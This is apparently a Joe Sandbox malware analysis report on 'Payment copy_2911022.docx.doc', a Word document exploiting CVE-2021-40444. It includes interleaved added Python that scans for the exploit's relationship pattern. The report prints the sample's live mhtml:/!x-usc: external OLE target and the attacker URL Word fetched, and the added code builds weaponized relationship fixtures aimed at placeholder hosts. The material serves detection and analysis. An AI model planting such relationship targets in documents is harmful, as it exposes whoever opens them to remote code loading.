
Windows Analysis Report
Payment copy_2911022.docx.doc

Overview

General Information

Sample Name: Payment copy_2911022.docx.doc
Analysis ID: 770660
MD5: cd3dbd5f1d468da826581361b619b393
SHA1: 9d5fc2d99aec7c8c18d8af7267b4a31801fda770
SHA256: 1c6189f068ee3870e1d41511bd55c02cef9d98a816a963a26f95ff0b6becea1f
Tags: doc, docx

Detection

CVE-2021-40444
Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Detected CVE-2021-40444 exploit
Contains an external reference to another file
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 1608, cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
No configs have been found
Source: document.xml.rels
Rule: EXPL_CVE_2021_40444_Document_Rels_XML
Description: Detects indicators found in weaponized documents that exploit CVE-2021-40444
Author: Jeremy Brown / @alteredbytes
Strings:
  • 0x3f8:$b1: /relationships/oleObject
  • 0x412:$c1: Target="mhtml:http
  • 0x45b:$c2: !x-usc:http
  • 0x49f:$c3: TargetMode="External"
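The rule above fires on four literal strings in document.xml.rels: an oleObject relationship whose Target uses the mhtml: scheme with a second URL nested behind !x-usc:, marked TargetMode="External". That is the CVE-2021-40444 delivery pattern: Word resolves the external OLE target through MSHTML, which fetches the remote page. The Python below is an added example, not part of the Joe Sandbox report or the Yara rule; it parses the relationship part structurally instead of by byte offset, compares case-insensitively (Yara strings are case-sensitive unless declared otherwise, so a casing variant would slip past the rule as written), and returns the URLs to hunt for in proxy and DNS logs. The two relationship parts and the hostname blog.example.invalid are constructed placeholders, not content of the analysed sample.

```python
"""Static check for the CVE-2021-40444 relationship pattern in an OOXML (.docx) package.

Added example, not part of the Joe Sandbox report. It mirrors the intent of the
EXPL_CVE_2021_40444_Document_Rels_XML rule without depending on Yara.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_SUFFIX = "/relationships/oleObject"

# Constructed sample parts (not extracted from the analysed document). The
# hostname is a placeholder; the structure mirrors the four Yara indicators.
WEAPONIZED_RELS = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:https://blog.example.invalid/wp-content/uploads/stage1!x-usc:https://blog.example.invalid/wp-content/uploads/stage1" TargetMode="External"/>
</Relationships>
"""

# Constructed benign counterpart: an OLE object embedded inside the package.
BENIGN_RELS = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/>
</Relationships>
"""


def build_docx(rels: bytes) -> bytes:
    """Build a minimal zip containing only the parts the scanner cares about."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


def urls_from_mhtml_target(target: str) -> list[str]:
    """Split 'mhtml:<url>!x-usc:<url>' into the URLs Word/MSHTML will request."""
    body = re.sub(r"^mhtml:", "", target, flags=re.IGNORECASE)
    return [u for u in re.split(r"!x-usc:", body, flags=re.IGNORECASE) if u]


def scan_docx(data: bytes) -> list[dict]:
    """Return one finding per OLE relationship that points outside the package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if not rel.get("Type", "").endswith(OLE_REL_SUFFIX):
                    continue
                target = rel.get("Target", "")
                indicators = []
                if rel.get("TargetMode", "").lower() == "external":
                    indicators.append("external_ole")
                if target.lower().startswith("mhtml:"):
                    indicators.append("mhtml_scheme")
                if "!x-usc:" in target.lower():
                    indicators.append("x_usc_nesting")
                if indicators:
                    findings.append({
                        "part": name,
                        "id": rel.get("Id"),
                        "indicators": indicators,
                        # URLs to correlate with proxy and DNS telemetry
                        "urls": urls_from_mhtml_target(target) if "mhtml_scheme" in indicators else [],
                    })
    return findings


if __name__ == "__main__":
    for label, rels in (("weaponized", WEAPONIZED_RELS), ("benign", BENIGN_RELS)):
        print(label, scan_docx(build_docx(rels)))
```

An external_ole finding without the mhtml indicators is still worth a look (a remote OLE target is unusual in mail attachments), but only the full triple corresponds to what this rule and this report describe.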
No Sigma rule has matched
No Snort rule has matched


AV Detection

Source: Payment copy_2911022.docx.doc | Avira: detected
Source: Payment copy_2911022.docx.doc | ReversingLabs: Detection: 41%
Source: Payment copy_2911022.docx.doc | Virustotal: Detection: 46%

Exploits

Source: document.xml.rels | Extracted files from sample: mhtml:https://pzsrblog.com/wp-content/uploads/2012/promzwfp385vxr!x-usc:https://pzsrblog.com/wp-content/uploads/2012/promzwfp385vxr
Source: unknown | HTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.22:49177 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.22:49182 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.22:49179 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.22:49183 version: TLS 1.2
Source: global traffic | TCP traffic: 192.168.2.22:49175 <-> 118.27.125.229:443 (repeated packets in both directions)
Source: global traffic | TCP traffic: 192.168.2.22:49176 <-> 118.27.125.229:443 (repeated packets in both directions)
Source: global traffic | TCP traffic: 192.168.2.22:49177 <-> 118.27.125.229:443 (repeated packets in both directions)
Source: global traffic | TCP traffic: 192.168.2.22:49178 <-> 118.27.125.229:443 (repeated packets in both directions)
Source: global traffic | TCP traffic: 192.168.2.22:49179 <-> 118.27.125.229:443 (repeated packets in both directions)
Source: global traffic | TCP traffic: 192.168.2.22:49180 <-> 118.27.125.229:443 (repeated packets in both directions)
Source: global traffic | TCP traffic: 192.168.2.22:49181 <-> 118.27.125.229:443 (repeated packets in both directions)
Source: global traffic | TCP traffic: 192.168.2.22:49182 <-> 118.27.125.229:443 (repeated packets in both directions)
Source: global traffic | TCP traffic: 192.168.2.22:49183 <-> 118.27.125.229:443 (repeated packets in both directions)
Source: global traffic | TCP traffic: 192.168.2.22:49184 <-> 118.27.125.229:443 (repeated packets in both directions)
Source: global traffic | TCP traffic: 192.168.2.22:49185 <-> 118.27.125.229:443 (repeated packets in both directions)
Source: global traffic | DNS query: name: pzsrblog.com (seven queries)
Source: global traffic | TCP traffic: 192.168.2.22:49175 through 49185 -> 118.27.125.229:443 (outbound packets, repeated for each of the eleven connections)
Source: global traffic | HTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | Host: pzsrblog.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | Host: pzsrblog.com | If-Modified-Since: Tue, 20 Dec 2022 05:25:57 GMT | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: pzsrblog.com | If-Modified-Since: Tue, 20 Dec 2022 05:25:57 GMT | Connection: Keep-Alive
Source: Joe Sandbox View | ASN Name: INTERQGMOInternetIncJP
Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: unknown | Network traffic detected: HTTP traffic on ports 49175 through 49185 <-> 443 (both directions, eleven connections)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 20 Dec 2022 13:08:02 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 19268 | Connection: close | Server: LiteSpeed | last-modified: Tue, 25 Jan 2022 07:44:20 GMT | etag: "4b44-61efaa54-78a64b804597b561;;;" | accept-ranges: bytes | x-turbo-charged-by: LiteSpeed
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 20 Dec 2022 13:08:11 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 19268 | Connection: close | Server: LiteSpeed | last-modified: Tue, 25 Jan 2022 07:44:20 GMT | etag: "4b44-61efaa54-78a64b804597b561;;;" | accept-ranges: bytes | x-turbo-charged-by: LiteSpeed
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 20 Dec 2022 13:08:16 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 19268 | Connection: close | Server: LiteSpeed | last-modified: Tue, 25 Jan 2022 07:44:20 GMT | etag: "4b44-61efaa54-78a64b804597b561;;;" | accept-ranges: bytes | x-turbo-charged-by: LiteSpeed
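All three requests for the stage URL came back 404, so the remote page was no longer being served when the sandbox ran: the chain stopped at the first fetch, and the report holds no second-stage artefacts beyond Word's own temp files. Two details in the captured requests matter for detection: the first two carry the ms-office / MSOffice 14 token in the User-Agent and the third does not, so a rule keyed on that token alone misses one of the three; and the path appears in two casings (lowercase in the extracted relationship, mixed case on the wire), so correlation with the document-extracted URL has to be case-insensitive. The Python below is an added example, not part of the Joe Sandbox report; it takes the raw request/response head as a sandbox or proxy would capture it and correlates it with the URL list extracted from the document. The request/response pair, the hostname blog.example.invalid and the path are constructed placeholders modelled on the headers above.

```python
"""Correlate an Office-originated HTTP fetch with the URL(s) extracted from the document.

Added example, not part of the Joe Sandbox report. The messages below are
constructed to mirror the headers shown in the report; host and path are placeholders.
"""
from urllib.parse import urlsplit

# URL list as it would come out of the document's relationship part (lowercase,
# as the sandbox printed it). Constructed placeholder.
DOCUMENT_URLS = ["https://blog.example.invalid/wp-content/uploads/2012/stage1"]

OFFICE_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; "
             "Trident/7.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)")
PLAIN_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; "
            "Trident/7.0; .NET4.0C; .NET4.0E)")


def make_request(user_agent: str) -> str:
    """Constructed request head; the path deliberately differs in case from DOCUMENT_URLS."""
    return (
        "GET /wp-content/uploads/2012/STAGE1 HTTP/1.1\r\n"
        "Accept: */*\r\n"
        f"User-Agent: {user_agent}\r\n"
        "UA-CPU: AMD64\r\n"
        "Accept-Encoding: gzip, deflate\r\n"
        "Host: blog.example.invalid\r\n"
        "Connection: Keep-Alive\r\n\r\n"
    )


RESPONSE_404 = (
    "HTTP/1.1 404 Not Found\r\n"
    "Date: Tue, 20 Dec 2022 13:08:02 GMT\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Content-Length: 19268\r\n"
    "Connection: close\r\n"
    "Server: LiteSpeed\r\n\r\n"
)


def parse_http_head(raw: str) -> tuple[str, dict[str, str]]:
    """Split a raw HTTP/1.1 message head into its start line and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def triage_fetch(request: str, response: str, document_urls: list[str]) -> dict:
    """Flag an Office fetch and say whether the remote stage was actually obtained."""
    req_line, req_h = parse_http_head(request)
    resp_line, _ = parse_http_head(response)
    method, path, _version = req_line.split(" ", 2)
    status = int(resp_line.split(" ", 2)[1])
    host = req_h.get("host", "").lower()
    ua = req_h.get("user-agent", "").lower()

    # host + path, case-folded, so the wire casing does not break the match
    targets = {f"{urlsplit(u).hostname}{urlsplit(u).path}".lower() for u in document_urls}
    flags = []
    if "ms-office" in ua or "msoffice" in ua:
        flags.append("office_user_agent")
    if f"{host}{path}".lower() in targets:
        flags.append("matches_document_target")
    if status == 200:
        flags.append("stage_retrieved")
    elif status in (404, 410):
        flags.append("stage_unavailable")

    if "matches_document_target" in flags:
        verdict = "exploit fetch, second stage " + ("retrieved" if status == 200 else "not retrieved")
    elif "office_user_agent" in flags:
        verdict = "office-originated fetch, review"
    else:
        verdict = "no indicator"
    return {"method": method, "host": host, "path": path, "status": status,
            "flags": flags, "verdict": verdict}


if __name__ == "__main__":
    print(triage_fetch(make_request(OFFICE_UA), RESPONSE_404, DOCUMENT_URLS))
    print(triage_fetch(make_request(PLAIN_UA), RESPONSE_404, DOCUMENT_URLS))
```

The verdict distinguishes an attempted fetch from a completed one: a 404 here means the host was exposed to the exploit document but did not receive the remote stage, which changes the response from containment to confirming that nothing else was loaded.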
Source: ~WRS{2DAED936-6AE5-4EA6-A2A6-98457564935D}.tmp.0.drString found in binary or memory: https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXr
Source: ~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp.0.drString found in binary or memory: https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXrA
Source: ~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp.0.drString found in binary or memory: https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXrAx-usc:https://pzsrblog.com/wp-content/up
Source: ~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp.0.drString found in binary or memory: https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXryX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D442B920-91E2-4DCA-989E-AADAC9D5BA07}.tmpJump to behavior
Source: unknownDNS traffic detected: queries for: pzsrblog.com
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: pzsrblog.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: pzsrblog.comIf-Modified-Since: Tue, 20 Dec 2022 05:25:57 GMTConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pzsrblog.comIf-Modified-Since: Tue, 20 Dec 2022 05:25:57 GMTConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.22:49179 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.22:49183 version: TLS 1.2
Source: document.xml.rels, type: SAMPLEMatched rule: EXPL_CVE_2021_40444_Document_Rels_XML date = 2021-09-10, author = Jeremy Brown / @alteredbytes, description = Detects indicators found in weaponized documents that exploit CVE-2021-40444, reference = https://twitter.com/AlteredBytes/status/1435811407249952772
Source: ~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: Payment copy_2911022.docx.docReversingLabs: Detection: 41%
Source: Payment copy_2911022.docx.docVirustotal: Detection: 46%
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: Payment copy_2911022.docx.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Payment copy_2911022.docx.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$yment copy_2911022.docx.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR5BC5.tmpJump to behavior
Source: classification engineClassification label: mal68.expl.evad.winDOC@1/20@7/1
Source: ~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp.0.drOLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Payment copy_2911022.docx.docInitial sample: OLE zip file path = word/media/image1.jpg
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: ~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp.0.drInitial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

barindex
Source: document.xml.rels | Extracted files from sample: mhtml:https://pzsrblog.com/wp-content/uploads/2012/promzwfp385vxr!x-usc:https://pzsrblog.com/wp-content/uploads/2012/promzwfp385vxr
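The relationship that fired EXPL_CVE_2021_40444_Document_Rels_XML and yielded the extracted mhtml:...!x-usc: target above lives in word/_rels/document.xml.rels inside the .docx zip, so it can be checked offline before any sandbox run. The Python below is an added example, not part of this report or of the quoted YARA rule. It builds two constructed in-memory fixtures (the host example.invalid and the path /uploads/lure are placeholders, not the report's indicators), flags an oleObject relationship that is both TargetMode="External" and uses the mhtml:/!x-usc: form, and recovers the URL after !x-usc:, which in this sandbox trace corresponds to the GET /wp-content/uploads/2012/PROMZwFp385vXr that Word issued with an "ms-office; MSOffice 14" user agent. A plain external hyperlink is deliberately left unflagged, since an external TargetMode on its own is normal in Office documents.

```python
"""
Added example (not from the Joe Sandbox report or the YARA rule it quotes):
scan a .docx for the CVE-2021-40444 relationship pattern, i.e. an oleObject
relationship in word/_rels/document.xml.rels whose external Target is an
mhtml: URL carrying an !x-usc: component. All hosts below are placeholders.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List

PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
RELS_PATH = "word/_rels/document.xml.rels"

# The two target-string indicators of the matched rule, made case-insensitive:
# the report's extracted target is lower-case while the raw strings are not.
MHTML_PREFIX = re.compile(r"^mhtml:(https?://)", re.IGNORECASE)
XUSC_SPLIT = re.compile(r"!x-usc:", re.IGNORECASE)


def build_docx(rels_xml: str) -> bytes:
    """Build a minimal .docx-shaped zip in memory (constructed fixture, not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr(RELS_PATH, rels_xml)
    return buf.getvalue()


def fetched_url(target: str) -> str:
    """Return the URL that ends up being requested: the !x-usc: part if present, else the mhtml: body."""
    parts = XUSC_SPLIT.split(target, maxsplit=1)
    if len(parts) == 2:
        return parts[1]
    return MHTML_PREFIX.sub(r"\1", target)


def scan_docx(data: bytes) -> List[Dict[str, str]]:
    """Flag external oleObject relationships whose Target uses the mhtml:/!x-usc: form."""
    findings: List[Dict[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        if RELS_PATH not in zf.namelist():
            return findings          # not a Word package, nothing to inspect
        root = ET.fromstring(zf.read(RELS_PATH))
    for rel in root.iter(f"{{{PKG_NS}}}Relationship"):
        target = rel.get("Target", "")
        is_ole = rel.get("Type") == OLE_REL_TYPE
        is_external = rel.get("TargetMode", "Internal").lower() == "external"
        has_mhtml = MHTML_PREFIX.match(target) is not None
        has_xusc = XUSC_SPLIT.search(target) is not None
        if is_ole and is_external and (has_mhtml or has_xusc):
            findings.append({
                "rid": rel.get("Id", ""),
                "target": target,
                "fetch_url": fetched_url(target),
                "indicators": " ".join(
                    name for name, hit in (("mhtml:", has_mhtml), ("!x-usc:", has_xusc)) if hit
                ),
            })
    return findings


# Constructed fixture mirroring the shape of the matched document.xml.rels.
# example.invalid and /uploads/lure are placeholders, not the report's IOCs.
MALICIOUS_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">\n'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>\n'
    '<Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpg"/>\n'
    '<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
    'Target="mhtml:https://example.invalid/uploads/lure!x-usc:https://example.invalid/uploads/lure" TargetMode="External"/>\n'
    '</Relationships>\n'
)

# Constructed benign fixture: an ordinary external hyperlink must not be flagged.
BENIGN_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">\n'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>\n'
    '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" '
    'Target="https://example.invalid/" TargetMode="External"/>\n'
    '</Relationships>\n'
)

MALICIOUS_DOCX = build_docx(MALICIOUS_RELS)
BENIGN_DOCX = build_docx(BENIGN_RELS)

if __name__ == "__main__":
    for hit in scan_docx(MALICIOUS_DOCX):
        print(f"{hit['rid']}: {hit['indicators']} -> fetches {hit['fetch_url']}")
    print("benign findings:", scan_docx(BENIGN_DOCX))
```

Run it against a real sample by replacing the fixture with open(path, "rb").read(); the same check applies to the other Office package types once RELS_PATH is adjusted, but this example covers only Word packages, which is what the report analysed.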
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (11 identical entries in the original report)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX (83 identical entries in the original report)
MITRE ATT&CK Matrix (number of matched signatures in parentheses; techniques without a number are the matrix's default entries and were not observed)

Tactic                  Techniques
Initial Access          Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution               Exploitation for Client Execution (13); Scheduled Task/Job; At (Linux); At (Windows)
Persistence             Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Privilege Escalation    Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Defense Evasion         Masquerading (1); Rootkit; Obfuscated Files or Information; Binary Padding
Credential Access       OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery               File and Directory Discovery (1); System Information Discovery (2); Query Registry; System Network Configuration Discovery
Lateral Movement        Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection              Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Exfiltration            Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer
Command and Control     Encrypted Channel (1); Non-Application Layer Protocol (3); Application Layer Protocol (14); Ingress Tool Transfer (4)
Network Effects         Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
Remote Service Effects  Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud
Impact                  Modify System Partition; Device Lockout; Delete Device Data
Antivirus detection (initial sample)

Source                         Detection  Scanner        Label
Payment copy_2911022.docx.doc  41%        ReversingLabs  Document-Office.Exploit.CVE-2021-40444
Payment copy_2911022.docx.doc  46%        Virustotal     (see VirusTotal link)
Payment copy_2911022.docx.doc  100%       Avira          EXP/CVE-2021-40444.Gen

No Antivirus matches (reported for three further categories)

Antivirus detection (URLs)

Source                                                                                                  Detection  Scanner          Label
https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXrA                                            0%         Avira URL Cloud  safe
https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXrAx-usc:https://pzsrblog.com/wp-content/up    0%         Avira URL Cloud  safe
https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXr                                             0%         Avira URL Cloud  safe
https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXryX                                           0%         Avira URL Cloud  safe
Domains

Name          IP              Active  Malicious  Antivirus Detection  Reputation
pzsrblog.com  118.27.125.229  true    true       (none)               unknown

Contacted URLs

Name                                                         Malicious  Antivirus Detection     Reputation
https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXr  false      Avira URL Cloud: safe   unknown

URLs from memory and binaries

Name                                                                                                  Source                                               Malicious  Antivirus Detection    Reputation
https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXrA                                          ~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp.0.dr  false      Avira URL Cloud: safe  unknown
https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXrAx-usc:https://pzsrblog.com/wp-content/up  ~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp.0.dr  false      Avira URL Cloud: safe  unknown
https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXryX                                         ~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp.0.dr  false      Avira URL Cloud: safe  unknown

Contacted IPs

IP              Domain        Country  ASN   ASN Name                Malicious
118.27.125.229  pzsrblog.com  Japan    7506  INTERQGMOInternetIncJP  true
    Joe Sandbox Version:36.0.0 Rainbow Opal
    Analysis ID:770660
    Start date and time:2022-12-20 14:07:07 +01:00
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 5m 21s
    Hypervisor based Inspection enabled:false
    Report type:light
    Sample file name:Payment copy_2911022.docx.doc
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:6
    Number of new started drivers analysed:1
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
